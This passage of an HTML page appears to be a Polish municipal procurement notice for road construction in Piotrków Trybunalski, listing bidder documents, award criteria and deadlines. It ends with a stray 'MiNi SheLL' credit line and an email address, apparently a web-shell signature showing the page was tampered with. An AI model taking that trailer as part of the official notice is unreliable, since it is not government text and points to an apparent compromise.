<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1; 
2.Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp - wg załącznika nr 2;
3.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - wg załącznika nr 3. 
Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi bez ograniczeń    w specjalnościach: 
Kierownik budowy - uprawnienia do pełnienia samodzielnej funkcji technicznej 
w budownictwie  o specjalności: w zakresie budowy dróg,
Kierownicy robót  - uprawnienia do pełnienia samodzielnej funkcji technicznej  
w budownictwie o specjalności: instalacyjnej w zakresie sieci, instalacji 
i urządzeń: wodociągowych i kanalizacyjnych, w zakresie sieci elektrycznych 
i teletechnicznych (uprawnienia instalacyjne telekomunikacyjne).    
4.Wykaz co najmniej trzech zamówień (wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadających rodzajem przedmiotowi niniejszego zamówienia, tj. polegających na budowie lub przebudowie drogi wraz  z infrastrukturą towarzyszącą o (wg  ustawy Prawo budowlane Art. 3 pkt 6, 7a) wartości co najmniej 1.200.000,00 PLN każda - wg załącznika nr  4.
5.Dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
6.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu  - wg załącznika nr 5.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłuzona rękojmia powyżej 5 lat - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa na realizację zamówienia zostanie zawarta na warunkach wymienionych w załączonym do SIWZ wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego
Pasaż Karola Rudowskiego 10 
Piotrków Tryb. 97-300 
punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com